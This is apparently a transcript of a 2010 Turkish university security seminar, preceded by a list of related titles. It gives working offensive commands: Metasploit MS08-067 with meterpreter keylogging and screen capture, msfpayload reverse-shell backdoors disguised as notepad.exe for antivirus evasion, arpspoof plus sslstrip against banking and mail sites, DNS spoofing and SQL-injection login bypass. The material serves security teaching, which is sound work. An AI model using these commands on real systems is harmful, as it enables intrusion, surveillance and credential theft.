Bilgi Güvenliği Semineri



Benzer belgeler
Güvenlik Riskleri ve Saldırı Yöntemleri. Ozan UÇAR Bilgi Güvenliği Akademisi (BGA)

İstemci Tabanlı Saldırı Türleri. Ozan UÇAR

Armitage Nedir? Kullanım Öncesi

VoIP Pentest NetSEC / Microso3 Türkiye Ozan UÇAR ozan.ucar@bga.com.tr

Anti-Virüs Atlatma 3. Kurulum

HAZIRLAYAN BEDRİ SERTKAYA Sistem Uzmanı CEH EĞİTMENİ

Güvenlik Riskleri ve Saldırı Yöntemleri

Anti-Virüs Atlatma 1. Resimden anlaşıldığı üzere 56 anti-virüs yazılımından 36 tanesi zararlı yazılım olduğunu doğrulamıştır.

Saldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları

Web Application Penetration Test Report

MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI

ORTA DOĞU TEKNİK ÜNİVERSİTESİ BİLGİ İŞLEM DAİRE BAŞKANLIĞI. Güvenlik ve Virüsler. ODTÜ BİDB İbrahim Çalışır, Ozan Tuğluk, Cengiz Acartürk

Veritabanı Sızma Testleri Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

Ağ Sızma Testleri ve 2. Katman Saldırıları Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

ZAFİYET TESPİTİ VE SIZMA YÖNTEMLERİ. Eyüp ÇELİK Bilgi Teknolojileri Güvenlik Uzmanı

ARP (Address Resolution Protocol) Poisoning -Ağın Korunma Yöntemleri

SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING)

Bilgi Güvenliği Açısından Sızma Testlerinin Önemi

HAVELSAN Siber Güvenlik Akademisi. Önlenemiyorsa Korunmak için Eğitim

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

ERİŞİM ENGELLEME DOS VE DDOS:

Firewall/IPS Güvenlik Testleri Eğitimi

VERİ GÜVENLİĞİ. Web Uygulamaları Güvenliği. Özer Çelik Matematik-Bilgisayar Bölümü

Bilgi Güvenliği Nedir? Bilgi Güvenliğinde Saldırı Kavramı. Bilgi Güvenliğinde Saldırı Örneği : SPAM Mail

Linux Temelli Zararlı Yazılımların Bulaşma Teknikleri, Engellenmesi ve Temizlenmesi

BİLGİSAYAR BİLİMLERİ ARAŞTIRMA VE UYGULAMA MERKEZİ BİLGİ GÜVENLİĞİ

KISIM I: HACKING B R ALAN OLARAK GÜVENL K

SÜRE BAŞLAMA TARİHİ : 19/12/2018 BİTİŞ TARİHİ : 20/02/2019 KURS SÜRESİ : 144 Saat KURS NO :

Ülkemizdeki Üniversite Web Sayfalarının Siber Güvenlik Açısından Hızlı Bir Değerlendirmesi

Yerel Ağlarda Port 139 ve Saldırı Yöntemi

LİNUX İŞLETİM SİSTEMİNİN KÖPRÜ MODUNDA ÇALIŞTIRILMASI VE GÜVENLİK DUVARI İŞLEMLERİ

ProFTPD FTP Sunucusu. Devrim GÜNDÜZ. TR.NET Sistem Destek Uzmanı.

MCR02-AE Ethernet Temassız Kart Okuyucu

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net

Anti-Virus Atlatma - Maligno Kullanımı

Google Hacking. Gelişmiş Google Operatörleri

BEYAZ ŞAPKALI HACKER EĞİTİMİ

Saldırgan Yaklaşımı. Nebi Şenol YILMAZ Danışman / Yönetici Ortak senol.yilmaz@secrove.com. Secrove Information Security Consulting

Linux Üzerinde İleri Düzey Güvenlik Duvarı Uygulamaları

05 - Veritabanı Sızma Testleri

/pikalite / bilgipi /pikalite EĞİTİM HİZMETLERİMİZ

Bilgisayar Ağları ve Ağ Güvenliği DR. ÖĞR. ÜYESİ KENAN GENÇOL HİTİT ÜNİVERSİTESİ ELEKTRİK-ELEKTRONİK MÜH.

BİLİŞİM SİSTEMLERİ GÜVENLİĞİ EĞİTİM KATALOĞU (2015)

HAZIRLAYAN BEDRİ SERTKAYA Sistem Uzmanı CEH EĞİTMENİ

Web Servis-Web Sitesi Bağlantısı

IPv6 Saldırı Araçları ve IPv6-GO Uygulamaları. Emre YÜCE - TÜBİTAK ULAKBİM 6 Mayıs 2010

BİLGİ GÜVENLİĞİ GÜZ DÖNEMİ ELEKTRONİK ORTAMLARDAKİ TEHDİTLER VE TÜRLERİ (DEVAM)

Gökhan AKIN İTÜ/BİDB Ağ Grubu Başkanı - ULAK/CSIRT

Ağ Topolojisi ve Ağ Yazılımları

Cisco 881 Router ve AirLink ES4X0, WAN Failover Tanımı

Özgür Yazılımlar ile Kablosuz Ağ Denetimi

Güvenlik Araçları. Savunmadan çok saldırı ya yönelik araçlar. Amaç, saldırganlardan önce sistemdeki açıkları ortaya çıkarıp gereken önlemleri almak.

EKLER EK 12UY0106-5/A4-1:

Windows Hacking - II

1 WEB GÜVENLIĞINE GIRIŞ

TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI

SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak

Elbistan Meslek Yüksek Okulu Güz Yarıyılı

Gökhan AKIN. ĐTÜ/BĐDB Ağ Grubu Başkanı ULAK-CSIRT Güvenlik Grubu Üyesi.

Anti-Virüs Atlatma 2. Kurulum

2008 Yılı Kritik Güvenlik Açıkları

İnternet Yapılandırma Gereksinimleri. PC lerin Yapılandırılması. Windows XP altında ayar yapılması

EC-485. Ethernet RS485 Çevirici. İstanbul Yazılım ve Elektronik Teknolojileri

Free Cooling (Tibbo Ethernet Modüllü)

Kurumsal Güvenlik ve Web Filtreleme

Giriş. İş Ortamlarına Yerleşimi. SecurityOnion Nedir? SecurityOnion İndirme Adresi. SecurityOnion Kurulumu. Kurulum Sonrası Yapılandırma

FTP ve Güvenlik Duvarları

01 Şirket Profili

ÖRÜN (WEB) GÜVENLİĞİ. Hazırlayan: Arda Balkanay

Kurumsal Güvenlik ve Web Filtreleme

İletişim Ağlarında Güvenlik

Tanımı Problemi 46 Şüpheci Yaklaşım 47 Tamsayı Taşması (Integer Overflow) 47 Tamsayı Taşması Java Uygulaması 48

Sızma Testlerinde Fiziksel Güvenlik Riskleri

Data Link Katmanı olarak adlandırılır. Fiziksel adresleme bu katmanda yapılır.

İnternet te Bireysel Güvenliği Nasıl Sağlarız? Rauf Dilsiz Bilgi Güvenliği Uzmanı

Güvenliğin Görüntülenmesi, Verilerin Analizi ve Atakların Eş Zamanlı Olarak Durdurulması. Akademik Bilişim Şubat 2006

NAT(Ağ Adresi Çeviricisi)

Ortamınızda A.D. veya LDAP sistemi var ise aşağıdaki linkten KoruMail LDAP-AD isimli dokümanı inceleyebilirsiniz.

Wireshark Lab.: DNS. 1. nslookup

Hızlı Kurulum Rehberi. ASUS AAM6030BI ADSL 4 Port Modem

Açık Kod VPN Çözümleri: OpenVPN. Huzeyfe ÖNAL

Web Uygulamarına Yönelik DoS DDoS Saldırıları ve Performans Testleri. Barkın

Web Uygulama Güvenliği Kontrol Listesi 2010

Icerik filtreleme sistemlerini atlatmak icin kullanacağımız yöntem SSH Tünelleme(SSH in SOCKS proxy ozelligini kullanacagiz).

IPV6'DA MULTICAST KRİTİĞİ

BİLİŞİM SİSTEMLERİ GÜVENLİĞİ EĞİTİM KATALOĞU (2016)

5651 ve 5070 Sayılı Kanun Tanımlar Yükümlülükler ve Sorumluluklar Logix v2.3 Firewall. Rekare Bilgi Teknolojileri

HAZIRLAYAN BEDRİ SERTKAYA Sistem Uzmanı CEH EĞİTMENİ

WebSiteDefender ile Web Uygulama Güvenliği

Elektronik Dergi ve Veri Tabanlarına Kampus Dışından Erişim

BONASUS. Ertuğrul AKBAS [ANET YAZILIM]

Ağ Bağlantısı Hızlı Kurulum Kılavuzu

BİLGİ GÜVENLİĞİ VE ZARARLI YAZILIMLAR. Bilgi Güvenliği: Kendimize ait olan bilginin başkasının eline geçmemesidir.

VOIP Ağlara Yönelik Sızma Testleri

KURUM AĞLARINI ÖNEMLĠ ZARARLI YAZILIM SALDIRILARINDAN KORUMA. Osman PAMUK

BİH 605 Bilgi Teknolojisi Bahar Dönemi 2015

SIRA NO SORUMLU BİRİM FAALİYET SORUMLU DURUM AÇIKLAMA

E-Mükellef Kontrol Programı Kullanım Kılavuzu

Sisteminiz Artık Daha Güvenli ve Sorunsuz...

Transkript:

Bilgi Güvenliği Semineri Kadir Has Universitesi Mühendislik Günleri '10 Etkinliği Bilgi Güvenliği Semineri Ozan UÇAR Certified Ethical Hacker mail@ozanucar.com

Hacking Kültürü Hakkında Bilgisayar yeraltı dünyası bir aynalı salondur. Gerçekler bükülür, doğrular küçülür. Sıfıra Doğru

Bilişim Güvenliği Bilişim ürünleri/cihazları ile bu cihazlarda işlenmekte olan verilerin gizliliğini, bütünlüğünü ve sürekliliğini korumayı amaçlayan bir alandır. Bilişim Güvenliğinin temel amaçları Veri Bütünlüğünün Korunması Erişim Denetimi Mahremiyet ve Gizliliğin Korunması Sistem Devamlılığının Sağlanması

Bir Saldırının Anatomisi 1)Keşif ( Footprinting ) Hedef hakkında bilgi toplama aşamasıdır. 2)Tarama(Scanning) Aktif sistemler, Servisler vb bilgiler toplanır. Güvenlik açığı aranır. 3)Girişi Sağlamak Saldırı gerçekleştirilir. Sistem kırılır. 4)Erişimi Devam Ettirmek Saldırgan içeride kalmak için rootkit, truva atı gibi yazılımlar kurar. 5)İzleri temizlemek

Keşif Aşaması Bu aşamada saldırgan hedef sistem hakkında bilgi toplamaya çalışır. Hedef Web Sayfası, Whois kayıtları, Arama motorları, e posta listeleri, sosyal ağlar vb kaynaklardan bilgi toplanır. Hedef sisteme ait alan adları IP adres aralığı Çalışmakta olan aktif sistemler Bu sistemler çalışan işletim sistemleri, servisler, yama seviyeleri

Tarama Aşaması Bu aşamada hedefin varlıklarını belirlemek için kullanılan tarama yöntemleri. Nmap ile port tarama. -st : Connect Scan nmap -st 192.168.1.1 -ss : SYN Scan nmap -st 192.168.1.1 -su : UDP Scan nmap -st 192.168.1.1 Nmap ile çalışan servislerin tespiti. nmap A 192.168.1.33 Nmap ile işletim sistemi tespiti. nmap O 192.168.1.1

Sisteme Sızmak Saldırgan bundan önceki adımlarda topladığı bilgilere dayanarak hedef sistemi kırmaya çalışacaktır. Ara Bellek istismarı (Buffer Overflow) Linux Kernel 2.6.18 root exploit FreeBSD 8 root exploit Microsoft Windows Xp SP3 / Server 2003 SP2 MS08 67 Yerel Ağ Saldırıları Sniffing ARP Poisoning SSL Trafiğinde araya girme

Sisteme Sızmak Linux root exploit user@debian:~$ uname a Linux debian 2.6.18 5 686 #1 SMP Fri Jun 1 00:47:00 UTC 2007 i686 GNU/Linux user@debian:~$ id uid=1002(user) gid=1002(user) gruplar=1002(user) user@debian:~$ ls la 2.6.18 exploit rwxr xr x 1 user user 6819 2010 04 09 22:08 2.6.18 exploit user@debian:~$./2.6.18 exploit sh 3.1# id uid=0(root) gid=0(root) gruplar=1002(user)

Sisteme Sızmak FreeBSD root exploit $ uname a FreeBSD pentester.cehturkiye.com 8.0 RELEASE FreeBSD 8.0 RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/generic i386 $ id uid=1002(ozanus) gid=1002(ozanus) groups=1002(ozanus) $./w00t.sh w00t.sh FreeBSD local r00t zeroday by Kingcope November 2009 # id uid=1002(ozanus) gid=1002(ozanus) euid=0(root) groups=1002(ozanus)

Sisteme Sızmak MS08 067 Ara Bellek istismarı (Remote Exploit) Exploit Kullanimi ; use windows/smb/ms08_067_netapi Payload Seçimi; set PAYLOAD windows/meterpreter/reverse_tcp Klavye girişlerini yakalamak ; migrate explorer.exe keyscan_start keyscan_dump keyscan_stop

Sisteme Sızmak Meterpreter Ekran Görüntüsü almak ; use espia screenshot /tmp/lol.bmp Hedef sistemten Sesi almak ; run soundrecort 20 Uzak masaüstü bağlantısı kurmak ; run getgui n 5657 u zuzu p 123 Host/Dns ayarlarını değiştirmek ; run hostsedit e 192.168.5.202,hotmail.com

Erişimi Devam Ettirmek Backdoor / Trojan oluşturma msfpayload windows/shell/reverse_tcp LHOST=10.0.0.202 LPORT=443 X > backdoor.exe msfpayload windows/shell/reverse_tcp LHOST=10.0.0.202 LPORT=443 R msfencode x notepad.exe t exe e x86/shikata_ga_nai c 10 o notepad2.exe Dinleme modu geçmek için; msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=10.0.0.202 LPORT=443 E virustotal.com tarama sonucu? Sonuç: 2/42 (4.76%) 42 güncel antivirüsten sadece 2 tanesi zararlı yazılım olduğunu tespit edebildi.

ARP Protokolü 1. Adım 192.168.1.33 Orada mısın? 2. Adım Ben 192.168.1.33. Buradayım! MAC adresim 11:22:33:44:55:66 1. A Bilgisayarı 192.168.1.33 IP adresli B bilgisayarına broadcast ile ARP isteği gönderir. 2. B Bilgisayarı kendisine gelen bu ARP isteğini yanıtlar ve MAC adresini A Bilgisayarına gönderir. 3. Her iki bilgisayar arasında iletişim başlar.

ARP Zehirleme 1. Adım 192.168.1.33 Orada mısın? 2. Adım Ben 192.168.1.33. Buradayım! MAC adresim 11:22:33:44:55:66 2. Adım Hayır! 192.168.1.33 Benim! MAC adresim 77:88:99:10:11:12 Saldırgan A makinesine sahte ARP yanıtları göndermeye başlar. A makinesinin ARP ön belleği (ARP Cache) zehirlenecek ve veriler saldırganın MAC adresine gönderecektir.

ARP Zehirleme arpspoof i eth0 10.0.0.100 10.0.0.2 kurban gateway ARP Zehirlemesi saldırısı sonucu kurban makinelerde IP MAC eşlemesi olması gerekenden farklı olacaktır.

Ortadaki Adam (MIM) 1. Adım 192.168.1.33 Orada mısın? 2. Adım Ben 192.168.1.33. Buradayım! MAC adresim 11:22:33:44:55:66 2. Adım Hayır! 192.168.1.33 Benim! MAC adresim 77:88:99:10:11:12 2. Adım Hayır! 192.168.1.10 Benim! MAC adresim 77:88:99:10:11:12 Saldırgan A ve B bilgisayarlarının ARP Cachlerini zehirler. Böylece A dan B ye giden tüm paketler Saldırgan üzerinden geçecektir.

Ortadaki Adam (MIM) 192.168.1.1 Kim? 192.168.1.1 Kim? Hayır! 192.168.1.1 Benim! MAC adresim 77:88:99:10:11:12 Saldırgan varsayılan ağ geçidi yerine geçerek tüm trafiği izler. Hayır! 192.168.1.1 Benim! MAC adresim 77:88:99:10:11:12 192.168.1.1 Benim. Ben Ağ Geçidiyim. MAC adresim AA:BB:CC:DD:EE:FF

SSL Trafiğinde Araya girme IP Forward Aktif Edilir; echo 1 > /proc/sys/net/ipv4/ip_forward Kurbanın arp tablosu zehirlenir; arpspoof i eth0 t 10.0.0.100 10.0.0.2 Iptable kullanılarak 80 den gelen istekler herhangi bir porta yönlendirilir; iptables t nat A PREROUTING p tcp destination port 80 j REDIRECT to ports 10000 SSLStript Başlatılır ; python sslstrip.py w gizli a l 10000 f Örnek ; gmail.com garanti.com.tr paypal.com

DNS Spoof Saldırganın yerel ağdaki DNS isteklerini izleyerek bu isteklere sahte cevaplar vermesine dayanır. Saldırgan bir DNS çözümleme işlemine müdahale ederek, kullanıcıları farklı sistemlere yönlendirebilir. Saldırgan, swithcli ağlarda ARP Zehirlemesi ile varsayılan ağ geçidini ele geçirmelidir.

DNS Çözümleme DNS Sorgusu (1) www.cehturkiye.com IP Adresi nedir? 1 2 3 DNS Cevabı (2) www.cehturkiye.com 10.20.30.40 www.cehturkiye.com 10.20.30.40 Kurban Bağlantı İsteği (3) www.cehturkiye.com 10.20.30.40 1. CEH Türkiye sitesi için alan adı sorgusu yapılır 2. Ön tanımlı DNS sunucusu alan adını çözümler ve IP adresini döndürür. 3. IP adresine bağlantı yapılarak CEH Türkiye sitesine ulaşılır.

DNS Spoof DNS Sorgusu (1) www.cehturkiye.com IP Adresi nedir? DNS Cevabı (2) www.cehturkiye.com 10.20.30.40 1 Kurban 3 2 Sahte DNS Cevabı (2) www.cehturkiye.com 66.66.66.66 www.cehturkiye.com 10.20.30.40 1. DNS sorgusu yapılır. 2. Saldırgan DNS Sorgusuna cevap verir. Sahte cehturkiye.com 66.66.66.66 3. Kurban saldırganın verdiği adresteki sahte siteye bağlanır.

Web Saldırıları Son zamanlarda saldırganlar doğrudan web uygulamalarındaki zayıflıkları hedef almaktadırlar. Zayıf bir web uygulaması nedeniyle uygulamanın çalıştığı web sunucusu kırılabilir veya bu uygulamayı kullanan ziyaretçilere saldırı düzenlenebilir. Web Saldırıları SQL Sokuşturma (SQL Injection) Betik Sokuşturma (XSS) Dosya Ekleme (RFI / LFI) Parametre Manipülasyonu Dizin Atlama

SQL Sokuşturma (SQL Injection) SQL Enjeksiyonu girdi doğrulama işlemleri yapmayan Web Uygulamalarında meydana gelen bir saldırıdır. Saldırgan, web uygulamasına gönderilen parametreleri değiştirerek farklı SQL ifadelerinin çalıştırılmasını sağlayabilir. Saldırgan; Giriş (Login) işlemlerini atlatabilir. Veritabanından kayıt okuyabilir. Veritabanından kayıt güncelleyebilir. Veritabanından kayıt silebilir.

Giriş Atlatma Girdi doğrulama yapılmayan uygulamalarda saldırgan kullanıcı adı ve parola alanlarına SQL ifadeleri yazarak kullanıcı doğrulama işlemlerini atlatabilir.

Giriş Atlatma SQL Sorgumuz aşağıdaki gibi olsun SELECT..WHERE k_id= k_parola AND k_parola= k_id Kullanıcı adı admin ve parola 123 olduğunda yukarıdaki sorguyu inceleyelim. SELECT..WHERE k_id= admin AND k_parola= 123 Saldırgan kullanıcı adı ve parola alanlarına or = yazdığında ne oluyor? SELECT..WHERE k_id= or = AND k_parola= or = or = ne anlama gelir?

Sorular?